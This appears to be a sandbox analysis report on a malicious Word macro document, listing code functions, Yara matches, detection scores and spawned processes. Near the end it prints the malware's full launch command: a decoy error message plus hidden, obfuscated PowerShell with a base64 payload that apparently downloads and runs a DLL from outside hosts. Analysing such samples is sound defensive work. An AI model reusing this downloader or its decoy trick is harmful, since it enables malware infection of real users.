Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EE05A	11_2_002EE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FA0AF	11_2_002FA0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E62A3	11_2_002E62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E48BD	11_2_002E48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E80BA	11_2_002E80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E60B9	11_2_002E60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E1280	11_2_002E1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F889D	11_2_002F889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E88E5	11_2_002E88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F12E2	11_2_002F12E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E1CFA	11_2_002E1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F26F5	11_2_002F26F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E96CD	11_2_002E96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F20C5	11_2_002F20C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8ADC	11_2_002F8ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E153C	11_2_002E153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EBB3A	11_2_002EBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EF536	11_2_002EF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F0D33	11_2_002F0D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F0F0C	11_2_002F0F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F7D03	11_2_002F7D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F7F1F	11_2_002F7F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F5D1D	11_2_002F5D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8D1C	11_2_002F8D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F511B	11_2_002F511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F2B16	11_2_002F2B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EB112	11_2_002EB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EC769	11_2_002EC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F0B68	11_2_002F0B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E8F78	11_2_002E8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E5B79	11_2_002E5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EE377	11_2_002EE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F1773	11_2_002F1773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F2349	11_2_002F2349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F8F49	11_2_002F8F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F9B45	11_2_002F9B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EB75F	11_2_002EB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E6754	11_2_002E6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E17AC	11_2_002E17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F73AC	11_2_002F73AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E69A0	11_2_002E69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F6DB9	11_2_002F6DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F61B8	11_2_002F61B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F878F	11_2_002F878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002EF98C	11_2_002EF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F9586	11_2_002F9586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E6D9F	11_2_002E6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E839D	11_2_002E839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E7998	11_2_002E7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F71EF	11_2_002F71EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002ED7EB	11_2_002ED7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F67E9	11_2_002F67E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F3FE7	11_2_002F3FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F31E2	11_2_002F31E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F1BDF	11_2_002F1BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002E9FDC	11_2_002E9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021B41F	12_2_0021B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00212C63	12_2_00212C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021EE78	12_2_0021EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021568E	12_2_0021568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00223895	12_2_00223895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002202C3	12_2_002202C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021C0C6	12_2_0021C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002242DA	12_2_002242DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00218736	12_2_00218736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00217B63	12_2_00217B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00224B41	12_2_00224B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002263C1	12_2_002263C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00212A30	12_2_00212A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00214A35	12_2_00214A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00219A37	12_2_00219A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022340A	12_2_0022340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227A0F	12_2_00227A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00225A61	12_2_00225A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022687F	12_2_0022687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021F444	12_2_0021F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021EA4C	12_2_0021EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021E05A	12_2_0021E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002162A3	12_2_002162A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022A0AF	12_2_0022A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002160B9	12_2_002160B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002180BA	12_2_002180BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002148BD	12_2_002148BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00211280	12_2_00211280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022889D	12_2_0022889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002212E2	12_2_002212E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002188E5	12_2_002188E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002226F5	12_2_002226F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00211CFA	12_2_00211CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002220C5	12_2_002220C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002196CD	12_2_002196CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228ADC	12_2_00228ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00220D33	12_2_00220D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021F536	12_2_0021F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021BB3A	12_2_0021BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021153C	12_2_0021153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227D03	12_2_00227D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00220F0C	12_2_00220F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021B112	12_2_0021B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00222B16	12_2_00222B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022511B	12_2_0022511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00227F1F	12_2_00227F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228D1C	12_2_00228D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00225D1D	12_2_00225D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021C769	12_2_0021C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00220B68	12_2_00220B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00221773	12_2_00221773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021E377	12_2_0021E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00215B79	12_2_00215B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00218F78	12_2_00218F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00229B45	12_2_00229B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00222349	12_2_00222349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00228F49	12_2_00228F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00216754	12_2_00216754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021B75F	12_2_0021B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002169A0	12_2_002169A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002117AC	12_2_002117AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002273AC	12_2_002273AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002261B8	12_2_002261B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00226DB9	12_2_00226DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00229586	12_2_00229586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0022878F	12_2_0022878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021F98C	12_2_0021F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00217998	12_2_00217998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021839D	12_2_0021839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00216D9F	12_2_00216D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002231E2	12_2_002231E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00223FE7	12_2_00223FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0021D7EB	12_2_0021D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002267E9	12_2_002267E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_002271EF	12_2_002271EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00221BDF	12_2_00221BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_00219FDC	12_2_00219FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FB41F	13_2_001FB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00205A61	13_2_00205A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F2C63	13_2_001F2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F60B9	13_2_001F60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002002C3	13_2_002002C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F1CFA	13_2_001F1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F153C	13_2_001F153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00207D03	13_2_00207D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F8736	13_2_001F8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00202B16	13_2_00202B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00208D1C	13_2_00208D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00204B41	13_2_00204B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F5B79	13_2_001F5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FE377	13_2_001FE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00202349	13_2_00202349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FC769	13_2_001FC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002031E2	13_2_002031E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F9FDC	13_2_001F9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F9A37	13_2_001F9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020340A	13_2_0020340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F4A35	13_2_001F4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F2A30	13_2_001F2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00207A0F	13_2_00207A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FE05A	13_2_001FE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FEA4C	13_2_001FEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FF444	13_2_001FF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020687F	13_2_0020687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001FEE78	13_2_001FEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020A0AF	13_2_0020A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F568E	13_2_001F568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F1280	13_2_001F1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F48BD	13_2_001F48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F80BA	13_2_001F80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00203895	13_2_00203895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001F62A3	13_2_001F62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_0020889D	13_2_0020889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_002012E2	13_2_002012E2

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: MAIL-0573188.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: MAIL-0573188.doc

OLE indicator, VBA macros: true

Yara signature match

Source: 00000005.00000002.2098977444.00000000003A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2099018850.0000000001BC6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =

Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@22/8@6/6

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 13_2_001F1C88 CreateToolhelp32Snapshot,

13_2_001F1C88

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,

7_2_10002D70

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$IL-0573188.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC5DD.tmp

Jump to behavior

Source: MAIL-0573188.doc

OLE indicator, Word Document stream: true

Source: MAIL-0573188.doc	OLE document summary: title field not present or empty
Source: MAIL-0573188.doc	OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ............h........................... .-.......-...............!.......!.............#...............................h.......5kU.......!.....	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ............h...$...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.!.....L.................!.....	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K......(.Q.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................*..j....................................}..v.... Z......0...............................$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................*..j..... ..............................}..v.....Z......0...............(.Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....................................}..v....xg......0...............................$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......Q.............................}..v.....h......0.................Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............z..j....................................}..v............0...............................$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............z..j..... ..............................}..v....P.......0.................Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............J..j.....(..............................}..v............0.................Q.............$...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....+...............J..j.....(..............................}..v....P.......0.................Q.............$...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL

Source: MAIL-0573188.doc	Virustotal: Detection: 66%
Source: MAIL-0573188.doc	Metadefender: Detection: 47%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnA